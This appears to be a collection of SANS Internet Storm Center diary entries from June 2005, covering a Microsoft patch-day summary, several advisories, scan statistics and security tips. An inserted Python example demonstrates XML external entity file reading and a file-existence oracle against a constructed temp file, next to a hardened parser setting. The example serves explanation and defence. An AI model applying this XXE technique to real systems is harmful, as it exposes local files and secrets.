Avira 06.20.2005 BDS/Haxdoor.CW

Fortinet 06.20.2005 W32/Haxdor.3048-tr

Kaspersky 06.20.2005 Backdoor.Win32.Haxdoor.cw

McAfee 4517 06.20.2005 BackDoor-BAC.gen.b

NOD32v2 1.1146 06.20.2005 a variant of Win32/Haxdoor

Sybari 7.5.1314 06.20.2005 Backdoor.Win32.Haxdoor.cw

Symantec 8.0 06.20.2005 Backdoor.Haxdoor.D

TheHacker 06.20.2005 Backdoor/Haxdoor.cw

VBA32 3.10.3 06.20.2005 Backdoor.Win32.Haxdoor.cw

I’d prefer to not post further details at this time to avoid false-positives or expose the readers to a real danger.

Update: If one were to do one’s job and follow-up on what Exploit.Helpcontrol really triggered on, a few minutes of effort would finally turn up a link to: http://www.microsoft.com/technet/security/bulletin/ms05-001.mspx
Ahh, such is the dangerous life of a volunteer incident handler, living on the edge of exposing your stupidity and suffering the wrath of readers. :-)

OpenRBL ist Kaput

Visitors to http://openrbl.org are greeted with a message reporting the demise of this free service. They are reporting that one can find similar services from

http://moensted.dk/spam/ and


Passive Reconnaissance and the Disaster Response Threat-space

While shopping for a gift for my old man last week, my attention was grabbed by Michal Zalewski's "Silence on the Wire: A Field Guide to Passive Reconnaissance and Indirect Attacks". From a simple flip through, it looks like some thought-provoking chapters are in there. I picked up a copy, because I can't resist another book to put on the bookshelf.

Recently, I participated in a disaster response drill with the State and Local Governments simulating a mass casualty accident. While managing my other duties in the drill, I took the opportunity to set up some passive sensors in the response centers to see what a potential attacker could pick up on when a massive group of first and second responders converges on a disaster scene.


There were the expected open 802.11 WAPs, but I was pleased not to see a plethora of wide-open Bluetooth devices full of juicy government contact numbers. This may simply have been caused by a lack of funds on the part of said governments to equip their staff with spiffy new cell phones, though.

Mod_jrun exploits spotted

Ben, a reader, has spotted an up-tick in exploit attempts against mod_jrun on his servers.

And as always, make sure you've patched Macromedia JRun.

Solstice Wishes

Remember to have a nice solstice, be it winter or summer in your area!


Kevin Liston



Published: 2005-06-19

Moving Precautions for the Security Paranoid Types

Well, it has been a very quiet day for me as the Handler on Duty. As such, it's hard to come up with a diary entry when it's been quiet like this. At the
recommendation of fellow handler Scott Fendley, and in light of the recent breaches in security for credit card companies and the concern for identity theft, I decided to focus this diary on a recent experience of mine.....a cross-country move.

Our family has just transplanted ourselves from Arizona to West Virginia. Yes, we were quite the gaggle moving cross country in two vehicles: my husband in the lead in one vehicle pulling a U-Haul, with a cat riding shotgun; I followed in the other vehicle with four kids (ages 10 and under), three dogs and three fish. We got hammered by a massive hailstorm in Texas and had a tornado barely miss us. It was quite an adventure, and being prepared is key. This move brought up a lot of things that need to be considered to help protect against identity theft and to deal with natural disaster. Some of them take time, but they are well worth it, and looking back now I wish I had done some of them. These are things that I was concerned about with the move and that hopefully will help someone else out.

Identity Theft

For us, prepping to move meant a lot of people we didn't know coming in and out of our house. We only had a short time frame to move once we were notified that
my husband had been accepted for a job he applied for. As such, we had a cleaning team coming in, workers doing repairs around the house (with four kids??? there might have been a few minor repairs needed:>), painters, movers, real estate agents showing the house to people, etc. It was absolute chaos and
impossible to monitor the activities of everyone who was there all the time. Here are some things to consider before people start showing up:

1. If there is time, go through all your documents and shred what you don't need. It's a good time for getting rid of things that aren't important. Make
sure you SHRED anything with personal information on it.

2. Make sure any bank statements, bills or any documents with personal/financial information are put away securely (to include jewelry and other valuables). It only takes a second for someone to see one laying out or open a desk drawer and grab a bank statement.

3. Also, don't allow the movers to pack any financial documents, bills, tax statements, etc. We transported those with us personally. It is too easy for something to be taken out of a box later when you're not around, or for the information to be copied and the document put back. You also don't know when you might need them along the way, and what if that very box is the one that disappears while the movers are transporting it?

4. I would also make sure that all of the SSN cards for family members, birth certificates, insurance documents, extra checks, etc. are kept where you can get to them. In an emergency you don't want them packed at the very bottom of the stack. Just keep them in a secure place in the vehicle and take them into the hotel room with you at night.

5. Make sure all local bank accounts are closed if you aren't planning on keeping the bank as your banking center. If you do it in person, you can get the paperwork showing it was closed. Also, keep good records of any other accounts closed and bills paid. If you are switching banks, make sure your auto-drafts/auto-deposits are all changed and pointing to the right account.

6. Don't forget to change your mailing address and/or put your mail on hold. If possible, have this go into effect a couple of days before you leave to ensure that mail isn't still being delivered. You don't want someone else getting your mail after they see you have gone. Especially junk mail for credit card offers etc. I would also recommend a credit check a month or two after you get to your destination to make sure that everything looks okay.

7. Transport your computer(s) with you. If you're like most folks, my family included, you probably use Quicken or some other software to track your finances, etc. The last thing you need is to have your computer disappear with that kind of information on it, whether because you let the movers pack it or because it was stolen from your vehicle (don't leave computer equipment in plain sight). You might want to just take your hard drive with you, but I wanted my whole network with me to have it available when I arrived. After all, isn't that the first thing everybody sets up? I'm sitting in a hotel right now typing this diary entry with my network happily set up around me while we wait for household goods to arrive. It's also handy if you pay bills online, to make sure nothing is late. I would also make a couple (yes, more than one) backups of the hard drive in case of an unforeseen natural disaster and/or accident. Which leads me to my next area....

Natural Disasters/Accidents

You never can plan for when an accident happens or a natural disaster strikes. These are some things you can do to be prepared if one happens to you.

1. Make sure all adults/older kids know where all the critical information is located like insurance cards, emergency phone numbers, insurance policies. Things can be very confusing in an emergency, but it is very important to have key things written down and have everyone know where things are located before you start your adventure. I would also send a copy to a trusted relative or two just so someone else has it as a back up.

2. You never can tell what can happen, so make sure your wills are updated and in a safe place where trusted folks have copies and/or know where they are.

3. Keep an emergency kit in your vehicle geared toward what you might encounter, and know ahead of time what the weather may or may not do. We did this and still hit very bad weather. Research ahead of time the route you're traveling and what you might encounter along the way. We went from the dangers of living in the desert right into tornado alley at a very active time of the year. Charged cell phones are critical here (trust me, ours became our lifeline during our adventure). Make sure you have your car charger with you.

4. Stay alert, make sure someone knows the route you plan on driving, and pull over if you're tired.

Okay, I could keep going on and on, but I'll stop for now. A move is a major event and protecting yourself is important. I hope this helps someone out there, and if anyone has something important that I missed that could help folks protect themselves from identity theft or be prepared in case of an accident or natural disaster, please send it in. Even if you're not moving, some of the points above will apply regardless and can help you to stay prepared.

I hope all of you dads out there had a wonderful Father's Day!

Lorna Hutcheson

Handler on Duty



Published: 2005-06-18

Sun ONE Messaging Server Vulnerability; Weaknesses in Wireless LAN Session Containment; Credit Card Breach

Sun ONE Messaging Server Vulnerability

A vulnerability has been reported in Sun ONE Messaging Server (iPlanet Messaging Server) that may allow a remote attacker to execute arbitrary JavaScript on the system of a target user who accesses the server with Internet Explorer.

Sun is working on a fix. For the details, please refer to:


Weaknesses in Wireless LAN Session Containment

One of our handlers, Joshua, wrote a paper on the session containment feature in various WLAN IDS products. Depending on the implementation, an attacker can evade this feature, and the containment traffic itself can be used to passively identify which WLAN IDS is deployed, which helps in deciding what attacks can be used without being detected by the IDS.

Over the weekend, you can enjoy reading his paper at:



Credit Card Breach

A few readers have submitted the news of a credit card breach that could potentially affect over 40 million card accounts.

According to the report, although the credit cards were compromised, the cards do not hold personal data such as social security numbers or birth dates, and thus that personal information is not at risk.

You can read the details at:




Published: 2005-06-17

Inside SANS Institute; Conference Links from Reader Submissions

This has been a strangely quiet day on the Internet. I am not complaining mind you, however, days like this make being the Handler On Duty a really dull task and makes the Diary content difficult to come up with.

I have decided to take this lull in the action as an opportunity to look at our “Mother Organization” SANS and point you to some terrific resources that are available on the site.

So with that said, let’s get started with a little background and discussion regarding SANS Institute and what they have to offer.

Inside SANS Institute

The SANS (SysAdmin, Audit, Network, Security) Institute was established in 1989 as a cooperative research and education organization. Today thousands of people and organizations participate in the programs, conferences, and training that are offered. In addition, thousands participate in the Internet Storm Center, DShield and the various newsgroups that are available through their forum.

SANS provides training and educational material, conferences and outstanding resources, such as the weekly vulnerability digest (@RISK), the weekly news digest (NewsBites), the Internet's early warning system (Internet Storm Center), flash security alerts and more than 1,200 award-winning, original research papers, all free to all who ask.

Most of you are probably familiar with the SANS site at:


Let’s first look at the About SANS link. On this page you will find links to some of the most valuable resources and material available.


Programs of the SANS Institute:

•Information Security Training (more than 400 multi-day courses in 90 cities around the world)

•The GIAC Certification Program (technical certification for people you trust to protect your systems)

•Consensus Security Awareness Training (for all the people who use computers)

•SANS Weekly Bulletins and Alerts (definitive updates on security news and vulnerabilities)

•SANS Information Security Reading Room (more than 1,200 original research papers in 75 important categories of security)

•SANS Step-by-Step Guides (booklets providing guidance on protecting popular operating systems and applications)

•SANS Security Policy Project (free security policy templates - proven in the real world)

•Vendor Related Resources (highlighting the vendors that can help make security more effective)

•Information Security Glossary (words, acronyms, more)

•Internet Storm Center (the Internet's Early Warning System)

•SCORE (helping the security community reach agreement on how to secure common software and systems)

•SANS/FBI Annual Top Twenty Internet Security Vulnerabilities List

•Intrusion Detection FAQ (Frequently asked questions and answers about intrusion detection)

•SANS Press Room (Our press room is designed to assist the media in coverage of the information assurance industry.)

SANS sponsors the Wednesday Webcast where we present information on various topics ranging from the latest patches from Microsoft to the latest worm/virus outbreak to the latest in Information Security.

SANS publishes the TOP 20 List and a lot of papers that help with everything from Securing your Home Computer to Standards, Practices and Procedures.

Of course one of the best things that SANS has going for it is the terrific group of volunteers at the Internet Storm Center. We enjoy being here and interacting with all of the Diary readers. We are happy to answer your questions, take a look at suspicious files that you send to us, listen to your complaints, and in general just be here for all of you. I “volunteer” in a lot of groups, belong to several boards and committees and I can tell you that by far this is the one that I enjoy participating in the most.

This is just a sample of the interesting information available through SANS Institute. Check out the training schedule, conference schedule and available resources. Take some time browsing around. I think you will find something for everyone at:


Conference Links from Reader Submissions and a couple more;

Zack said "ISC2 has a list of some conferences in their Resource Guide for Today's Information Security Professional, (the "schedule" starts on about the 11th page)."

Juha-Matti submitted the Help Net Security

IrishMASMS submitted conference links at
and while there I saw a page with links to


Other conference links, of course there's
Other conference links: of course there's SANS (http://www.sans.org/), and the lists at the University of Cambridge Security Conference List and Cipher's Calendar of Security and Privacy Related Events. Thanks everyone!

Thanks to Patrick Nolan for compiling the list of Conference Links for us.

Deb Hale

Handler On Duty

Published: 2005-06-16

UK Critical Infrastructure and Business Trojan Attacks (Updated), imap scanning, Opera vulns, Adobe Reader/Acrobat vuln, NIST Control Tool, Mailbag

UK Critical Infrastructure and Business Trojan Attacks

Britain's NISCC has issued "Breaking News" and is "warning that vital computer networks are at risk of attack." "The attackers' aim appears to be covert gathering and transmitting of commercially or economically valuable information." "To learn more see the NISCC briefing Targeted Trojan Email Attacks"



UPDATE: Other governments have issued warnings. A principal concern is:

"The subject line and text of the e-mails appear relevant to the recipient’s work, or may be
copied from a previous legitimate e-mail;

"The attachment name and type appear relevant to the text and to the recipient’s work."(1)

(1) Canadian Cyber Incident Response Centre CCIRC

Australian Department of Defence DSD Advisory DA-2005-01


imap scanning

DShield data covering the last year shows port 143 (IMAP) being probed on several days by a relatively small number of sources that each hit an unusually large number of targets. The notable dates are:

Date         Sources   Targets
2005-06-11       82    143,714
2005-06-02       83    102,212
2005-05-02       57     94,422
2005-04-07       68    102,246

There have been multiple imap vulnerabilities (and patches) announced by various vendors over the same time period (and earlier). They can be reviewed at;
FrSIRT "imap" string search results;

And "Thanks" FrSIRT for the site tweak!
Secunia "imap" string search - announcements by date;


Opera Cross Site Scripting and Security Bypass Vulnerabilities
FrSIRT has posted information about three Opera vulnerabilities, described at;

Opera Upgrade Links
"First Opera 8 upgrade released today, Oslo, Norway - June 16, 2005"

For Mac lovers, "Opera 8 delivers secure browsing to Macintosh - Oslo, Norway - June 16, 2005"

Verisign's "Internet Security Intelligence Briefing - June 2005" is available here:

http://www.verisign.com/static/030910.pdf Always a great read.

Mailbag - a Security Conference resource and subject matter question

I'll try to post useful answers to the areas of interest expressed in the next submission by the end of the shift.

Gary "was wondering if you could ask the readers of the diary which security conferences they find worthwhile to attend (besides the always educational SANS conferences, of course)? I have some money in the budget for training/conferences and not only was I unable to find a security conference that sounded interesting, I couldn't even find a calendar that listed upcoming conferences by various organizations. Does such a thing exist?"

Adobe Reader and Acrobat 7.0-7.0.1 vulnerability

XML External Entity vulnerability (Adobe Reader and Acrobat 7.0-7.0.1)
From Adobe - "Under certain circumstances, using XML scripts it is possible to discover the existence of local files" and "the impact is minimized due to the fact that the existence of local files can only be discovered if the complete filenames and paths are known in advance by the attacker." Upgrade links are at;
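This is the XML External Entity (XXE) class of bug, and it is not specific to Acrobat: any XML parser that honours external general entities behaves the same way. The following added example is mine, not Adobe's and not from the ISC diary. It uses Python's xml.sax to show both halves of the Adobe statement: the content leak when the parser is configured to resolve external entities, and the existence oracle that remains even when nothing is echoed back, because the parse fails only when the named file cannot be opened. In both cases the attacker has to know the complete path in advance, which is exactly the limitation Adobe describes. The hardened variant is the same parser with external general entities disabled (the default in current Python). The entity name "leak", the probe document, the temporary file and its contents are all constructed for the demonstration.

```python
import os
import tempfile
import xml.sax
from io import BytesIO
from xml.sax.handler import ContentHandler, feature_external_ges


class _TextCollector(ContentHandler):
    """Keeps the character data the parser hands us, i.e. whatever replaced &leak;."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def build_probe_document(path: str) -> bytes:
    """Attacker-supplied XML: an external general entity whose system identifier
    is a local file, referenced from the document body (constructed entity name)."""
    return (
        '<?xml version="1.0"?>'
        f'<!DOCTYPE probe [<!ENTITY leak SYSTEM "{path}">]>'
        "<probe>&leak;</probe>"
    ).encode()


def parse_text(xml_bytes: bytes, resolve_external_entities: bool) -> str:
    """Parse with xml.sax; the single feature flag is the whole difference between
    the vulnerable and the hardened configuration."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)  # True == XXE
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.parse(BytesIO(xml_bytes))
    return "".join(collector.chunks)


def file_exists_oracle(path: str) -> bool:
    """What a vulnerable parser gives an attacker even when the content is never
    shown: the parse succeeds only if the file could be opened."""
    try:
        parse_text(build_probe_document(path), resolve_external_entities=True)
        return True
    except Exception:  # SAXParseException, or the resolver's own OSError/ValueError
        return False


def demo():
    """Write a constructed 'secret' file, then compare the two parser configurations.
    Returns (vulnerable_result, hardened_result, oracle_existing, oracle_missing)."""
    fd, path = tempfile.mkstemp(prefix="xxe-demo-", suffix=".txt")
    with os.fdopen(fd, "w") as fh:
        fh.write("db_password=hunter2")  # constructed secret, not a real credential
    try:
        vulnerable = parse_text(build_probe_document(path), resolve_external_entities=True)
        hardened = parse_text(build_probe_document(path), resolve_external_entities=False)
        exists = file_exists_oracle(path)
        missing = file_exists_oracle(path + ".absent")
    finally:
        os.unlink(path)
    return vulnerable, hardened, exists, missing


if __name__ == "__main__":
    print(demo())
```

The hardened configuration leaves the entity reference empty rather than failing, so a parser that must accept DTDs from untrusted sources should be checked for exactly this setting; disabling the DTD altogether is the stronger option where the format allows it.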



NIST Control Tool
I missed this announcement in April, better late than never, ymmv;
NIST SP 800-53 Database Application


General: The NIST SP 800-53 database application is a FileMaker runtime database solution. It represents the security controls, organized into families for ease of use in the control selection and specification process. The security control structure consists of three key components: a control section, a supplemental guidance section, and a control enhancements section. The
minimum assurance requirements (i.e., low, moderate, and high) for security controls are applicable to each control. The user can browse the security controls based on various criteria, search for a specific control, and export the controls to various file types (e.g., tab-separated text file, comma-separated text file, XML, etc.).


The application is a self-contained read-only executable and requires at least 50 MB of free disk space. The NIST SP 800-53 database application requires Microsoft Windows 2000 or XP and will not run under Windows 9x. The database application has also been tested with Mac OS X Version 10.3.x.

Patrick Nolan


Published: 2005-06-15

Patch day fallout minor, Sun Java updates, and What to do about Windows NT?

Problems reported as a result of Microsoft patch day were rare,
and generally minor. One person reported that web pages no longer allow
content to be loaded into another frame in IE. We had conflicting
results on whether program defaults were reset by the patch set; some
people found that they were, others said their choices were left as is.

Sun Java vulnerabilities

Sun Java implementations (J2SE 1.4.2*, 5.0, and 5.0 update 1,
and Java Web start 5.0 and 5.0 update 1; Windows, Solaris, and Linux are
all affected) have vulnerabilities that "may allow an untrusted
application to elevate its privileges. For example an application may
grant itself permissions to read and write local files or execute local
applications that are accessible to the user running [the application or
applet]." J2SE 1.3.1_xx releases are not affected.

More details are available at:
, and

Many thanks to Peter Stendahl-Juvonen for bringing this to our attention.

Windows NT

There's one thing that might be overlooked in the rush to patch
current Windows systems. Because Windows NT is unsupported (and Windows
2000's cutoff is rapidly approaching), you need to consider the effect
of leaving unpatched systems running. Many of the unpatchable
vulnerabilities are remotely exploitable in some form; as time goes on, older
OSes become increasingly vulnerable.

This is certainly not peculiar to Windows OS's. The above
applies to any operating system for which patches are not being created.

-- Handler on Duty,

Published: 2005-06-14

Microsoft Releases 3 Critical Patches - Hilarity Does Not Ensue; MS Patches Reset Settings in Program Defaults?

Microsoft Releases 3 Critical Patches - Hilarity Does Not Ensue

Thanks to the other Handlers for their assistance in compiling this summary. All in all, not a terrible list. -025 will probably lead to another round of e-mail worms with images in them, which should be easy to filter (this should only impact end-user machines, as one hopes you don't surf the web or check e-mail from your servers). -026 requires either the compromise of an assumed-good site or tricking people into visiting a malicious website; expect it to be used in the spyware/adware coming to a pop-up near you. For -027, that traffic should be filtered at your gateway anyway, but it may have some worm potential. I really hope you aren't running telnet (-033). -031 is the only real pain of the bunch, where you'll have to search for orun32.exe to see if you have Interactive Training installed. It may or may not be in Add/Remove Programs.

Bulletin   Severity    Impact
MS05-025   Critical    Remote Code Execution (replaces MS05-020); end-user machines only
MS05-026   Critical    Remote Code Execution (replaces MS03-044, MS04-023, MS05-001)
MS05-027   Critical    Remote Code Execution (replaces MS02-070, MS03-024)
MS05-028   Important   Remote Code Execution
MS05-029   Important   Remote Code Execution
MS05-030   Important   Remote Code Execution
MS05-031   Important   Remote Code Execution
MS05-032   Moderate    Spoofing
MS05-033   Moderate    Information Disclosure
MS05-034   Moderate    Elevation of Privilege

Critical Vulnerabilities

Microsoft Security Bulletin MS05-025 - Cumulative Security Update for Internet Explorer (883939) - Critical
http://www.microsoft.com/technet/security/bulletin/MS05-025.mspx

This update replaces MS05-020
(http://www.microsoft.com/technet/security/Bulletin/MS05-020.mspx)

This patch addresses two main issues:

- A vulnerability in the parsing of PNG files. This vulnerability can
be exploited by a visit to a site hosting a malicious graphic file and
allows remote code execution due to an unchecked buffer in the PNG
rendering code.

- An issue in the XML <script> tag handling that can allow a remote
attacker to read arbitrary XML files, and portions of other files, on the
victim's machine (by using a URL with the “src” attribute pointing at the
local file system).

These vulnerabilities affect IE 5.01, 5.5 and 6 on virtually every
Microsoft platform. Also (and this is IMPORTANT) Outlook and Outlook
Express use IE’s HTML rendering engine and are vulnerable to these
issues. Both of these vulnerabilities could be exploited by HTML
email containing malicious content.

Both of these issues have the potential to be used as part of an email
based virus and could be triggered under Outlook/OE simply by viewing
HTML formatted messages.
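Image-borne e-mail worms are only "easy to filter" if the filter actually looks inside the file. The following added example is mine, not Microsoft's, and it is not a signature for the MS05-025 exploit, whose internals the bulletin does not describe. It is the kind of structural PNG sanity check a mail gateway or web proxy can run before an image reaches a renderer: it walks the chunk list and rejects any chunk whose declared length runs past the end of the data (the "trust the length field" mistake behind unchecked-buffer bugs in general), whose CRC does not match, or which breaks the IHDR/IEND structure. The minimal PNG samples and the 16 MiB per-chunk policy limit are constructed for the demonstration.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
MAX_CHUNK_LEN = 1 << 24  # 16 MiB: an assumed gateway policy cap, not a rule of the PNG format


def png_chunk(chunk_type: bytes, data: bytes) -> bytes:
    """Encode one chunk: 4-byte big-endian length, 4-byte type, data, CRC-32 over type+data."""
    crc = zlib.crc32(chunk_type + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + chunk_type + data + struct.pack(">I", crc)


def validate_png(blob: bytes, max_chunk_len: int = MAX_CHUNK_LEN) -> list:
    """Walk the chunk list; return a list of findings (empty list == structurally sane).

    The check that matters for the unchecked-buffer class is the first one in the
    loop: the declared length must fit inside the bytes actually present before
    anything is read, allocated or copied on the strength of that length."""
    if not blob.startswith(PNG_SIGNATURE):
        return ["bad PNG signature"]
    findings = []
    pos = len(PNG_SIGNATURE)
    seen_ihdr = seen_iend = False
    while pos < len(blob):
        remaining = len(blob) - pos
        if remaining < 12:  # length(4) + type(4) + crc(4) is the smallest possible chunk
            findings.append(f"truncated chunk header at offset {pos}")
            break
        length, ctype = struct.unpack(">I4s", blob[pos:pos + 8])
        if length > remaining - 12:
            findings.append(f"chunk {ctype!r} at offset {pos} declares {length} bytes "
                            f"but only {remaining - 12} remain")
            break
        if length > max_chunk_len:
            findings.append(f"chunk {ctype!r} at offset {pos} exceeds policy limit ({length} bytes)")
            break
        data = blob[pos + 8:pos + 8 + length]
        (stored_crc,) = struct.unpack(">I", blob[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + data) & 0xFFFFFFFF != stored_crc:
            findings.append(f"CRC mismatch in chunk {ctype!r} at offset {pos}")
        if ctype == b"IHDR":
            if pos != len(PNG_SIGNATURE) or length != 13:
                findings.append("IHDR must be the first chunk and exactly 13 bytes long")
            seen_ihdr = True
        elif ctype == b"IEND":
            seen_iend = True
            if pos + 12 + length != len(blob):
                findings.append("trailing data after IEND")
            break
        pos += 12 + length
    if not seen_ihdr:
        findings.append("missing IHDR")
    if not seen_iend:
        findings.append("missing IEND")
    return findings


# Constructed samples: a minimal 1x1 greyscale PNG and two corrupted variants of it.
IHDR_1x1_GREY = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # w, h, depth, colour, compr, filter, interlace


def sample_good_png() -> bytes:
    idat = zlib.compress(b"\x00\x00")  # one scanline: filter byte 0 + one 8-bit grey pixel
    return (PNG_SIGNATURE + png_chunk(b"IHDR", IHDR_1x1_GREY)
            + png_chunk(b"IDAT", idat) + png_chunk(b"IEND", b""))


def sample_oversized_length_png() -> bytes:
    """Same file with the IDAT length field rewritten to 0xFFFFFFF0 while the data
    stays short: a renderer that allocates or copies by the length field alone is
    the kind of code that ends up with an unchecked buffer."""
    good = sample_good_png()
    idat_offset = len(PNG_SIGNATURE) + 12 + 13  # signature + the complete IHDR chunk
    return good[:idat_offset] + struct.pack(">I", 0xFFFFFFF0) + good[idat_offset + 4:]


def sample_bad_crc_png() -> bytes:
    """Same file with one byte of the IHDR width flipped, so the stored CRC no longer matches."""
    damaged = bytearray(sample_good_png())
    damaged[len(PNG_SIGNATURE) + 8 + 3] ^= 0x03  # last byte of the 4-byte width field
    return bytes(damaged)


if __name__ == "__main__":
    for name, sample in (("good", sample_good_png()),
                         ("oversized length", sample_oversized_length_png()),
                         ("bad crc", sample_bad_crc_png())):
        print(f"{name}: {validate_png(sample) or 'OK'}")
```

A check like this does not prove an image is safe (a well-formed PNG can still carry a renderer exploit), but it cheaply rejects the malformed files that length-confusion bugs depend on, and the same length-versus-remaining-bytes rule applies to any chunked or length-prefixed format.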

It also changes a few other things: Updates the MSIE pop-up blocker,
changes the handling of malformed .GIF and .BMP files, and removes
handling of XBM images from all IE platforms. It also sets the kill bit
for older versions of the Microsoft DigWebX ActiveX control and for all
versions of the Microsoft MsnPUpld ActiveX control. (Why, oh why, must
MS bundle these things together…?)


PNG: Un-register IE’s ability to render PNG files: run “regsvr32 /u
pngfilt.dll” (This can also be done via registry entries… see the MS
bulletin below).

XML: Setting IE’s “Internet” zone to “high security” will limit the
files exposed on the target machine.

Links of interest:




MS05-026 (KB896358) - Vulnerability in HTML Help Could Allow Remote Code Execution
http://www.microsoft.com/technet/security/bulletin/MS05-026.mspx

Affects: Essentially all active Windows platforms.

Replaces: MS03-044, MS04-023, MS05-001

HTML Help fails to validate input data which could result in the ability
of a remote attacker to execute code on an affected system.

An attacker would be required to host malicious content on a website or
via a banner ad. It appears currently that this cannot be exploited
through HTML email.

This may be a possible new avenue for spyware/adware or other bulk

Side effects: This security update restricts the use of the InfoTech
protocol (ms-its, its, mk:@msitstore) from processing content that is
served from outside the Local Machine zone. This change may prevent
certain kinds of Web-based applications from functioning correctly.

Workarounds: Un-register the InfoTech protocol from HTML Help by
running "regsvr32 /u %windir%\system32\itss.dll". Note that this also disables local HTML Help (.chm) content until the DLL is re-registered.

Links of interest:



MS05-027 (KB896422) - Vulnerability in Server Message Block Could Allow Remote Code Execution
(http://www.microsoft.com/technet/security/bulletin/MS05-027.mspx). This patch addresses the following vulnerability:

- Server Message Block Vulnerability - A remote code
execution vulnerability exists in Server Message Block (SMB) that could
allow an attacker who successfully exploited this vulnerability to take
complete control of the affected system.

All supported versions of Windows 2000, XP, and Server 2003 appear to have
a severity rating of Critical on this vulnerability. However, XP SP2
systems will be less likely for attack as the affected ports are blocked
from responding by the Windows Firewall by default. Changes to the default
settings will cause the vulnerability to be at the same critical level as
Windows XP SP1.

As has been the standard practice, it is recommended that ports 139 and 445
be blocked at the firewall.

For more information about this vulnerability and the associated patch, see Microsoft Knowledge Base Article 896422 (http://support.microsoft.com/kb/896422).

MS05-027 Update: There have been a few people who have written in expressing confusion on whether there needs to be authentication for this exploit to work. A plain reading of the bulletin by Microsoft indicates that this is a pre-authentication bug and that any anonymous user can theoretically exploit it.

Important Vulnerabilities

MS05-028 (KB896426) - Vulnerability in Web Client Service
(http://www.microsoft.com/technet/security/bulletin/MS05-028.mspx). This patch addresses the following vulnerability:

- Web Client Vulnerability - A remote code execution
vulnerability exists in the way that Windows processes Web Client requests
that could allow an attacker who successfully exploited this vulnerability
to take complete control of the affected system. This vulnerability can
not be exploited by anonymous users as the attacker must have valid logon
credentials to allow the remote code execution and privilege elevation.

As has been the standard practice, it is recommended that ports 139 and 445
be blocked at the firewall. Additionally if this service is not required
for WebDAV aware applications, the service can be disabled to limit the

For more information about this vulnerability and the associated patch, see Microsoft Knowledge Base Article 896426 (http://support.microsoft.com/kb/896426).

MS05-029 (KB895179) - Vulnerability in Outlook Web Access for Exchange Server 5.5 Could Allow Cross-Site Scripting Attacks
(http://www.microsoft.com/technet/security/bulletin/MS05-029.mspx)

- Exchange Server Outlook Web Access Vulnerability

Vulnerable: Exchange Server 5.5 SP4

This is a cross-site scripting vulnerability. The cross-site scripting
vulnerability could allow an attacker to convince a user to run a
malicious script. If this malicious script is run, it would execute in
the security context of the user. Attempts to exploit this vulnerability
require user interaction. This vulnerability could allow an attacker
access to any data on the Outlook Web Access server that was accessible
to the individual user.

Not Vulnerable: Exchange Server 2000 SP3 with post-SP3 Update Rollup,
Exchange Server 2003, Exchange Server 2003 SP1

Software Required for Update:

W2K SP3 - IE 5.01 SP3

W2K SP4 - IE 5.01 SP4

other OSes - IE 6 SP1

For more information about this vulnerability and the associated patch,
see Microsoft Knowledge Base Article 895179 (http://support.microsoft.com/kb/895179).

MS05-030 (KB897715) - Cumulative Security Update in Outlook Express
(http://www.microsoft.com/technet/security/bulletin/MS05-030.mspx)

- Outlook Express News Reading Vulnerability (CAN-2005-1213, http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1213)

A remote code execution vulnerability exists in Outlook Express when it
is used as a newsgroup reader. An attacker could exploit the
vulnerability by constructing a malicious newsgroup server that could
potentially allow remote code execution if a user queried the
server for news. An attacker who successfully exploited this
vulnerability could take complete control of an affected system.
However, user interaction is required to exploit this vulnerability.

Vulnerable: Win98, Win98SE, WinME, W2K (SP3 and SP4), W2K3, WXP SP1, WXP
64-bit (RTM and SP1)

Not Vulnerable: W2K3 SP1, WXP SP2

Affected Software:

OE 5.5 SP2 on W2K (SP3 and SP4)

OE 6 SP1 on W2K (SP3 and SP4), WXP SP1, WXP 64-bit (RTM and SP1)

OE 6 on W2K3, WXP 64-bit

For more information about this vulnerability and the associated patch,
see .

MS05-031 (KB898458) - Vulnerability in Step-by-Step Interactive Training Could Allow Remote Code Execution
(http://www.microsoft.com/technet/security/bulletin/MS05-031.mspx)

This patch addresses a vulnerability in the Interactive Training software shipped with some Microsoft Press books and installed by some OEM computer manufacturers; it is not installed by default on most systems. An attacker would have to create a malicious bookmark link file, deliver it to the victim by email or on a web site, and get the victim to open it. Interactive Training bookmarks use the extensions .CBO, .CBL and .CBM. To mitigate this vulnerability you can disable these extensions by editing the registry, uninstall the software, or apply the patch. The presence of orun32.exe indicates that Interactive Training may be installed; versions earlier than are vulnerable.

* http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1212

Vulnerable: Windows 2000 SP3 and 4; Windows XP SP1 and 2; Windows XP 64-Bit
Edition SP1 (Itanium); Windows XP 64-Bit Edition Version 2003 (Itanium);
Windows XP Professional x64 Edition; Windows Server 2003 and SP1; Windows
Server 2003 and SP1 for Itanium; Windows Server 2003 x64; Windows 98 and SE;
Windows ME.

For more information about this vulnerability and the associated patch, see

Moderate Vulnerabilities

MS05-032 (KB890046) - Vulnerability in Microsoft Agent Could Allow Spoofing (http://www.microsoft.com/technet/security/bulletin/MS05-032.mspx).
This patch addresses the way Internet Explorer and Microsoft Agent can allow a
hostile web site to spoof trusted web content and, if you are browsing while
logged in as an administrator, potentially take control of your system and
execute arbitrary code. Setting all Internet Explorer zones to High (which
disables ActiveX) will break IE for some sites, but also mitigates the
vulnerability. What is Microsoft Agent, you ask? Check this web site for
information: http://www.microsoft.com/msagent/default.asp

* http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1214

Vulnerable: Windows 2000 SP3 and 4; Windows XP SP1 and 2; Windows XP 64-Bit SP1
(Itanium); Windows XP 64-Bit 2003 (Itanium); Windows XP Professional x64;
Windows Server 2003 and SP1; Windows Server 2003 and SP1 for Itanium; Windows
Server 2003 x64; Windows 98 and SE; Windows ME.

For more information about this vulnerability and the associated patch, see

This patch addresses the following vulnerability:

- Telnet Vulnerability: An attacker who successfully exploited this information disclosure vulnerability could remotely read the session variables for users who have open connections to a malicious telnet server.
(You aren't still running telnet... are you?)

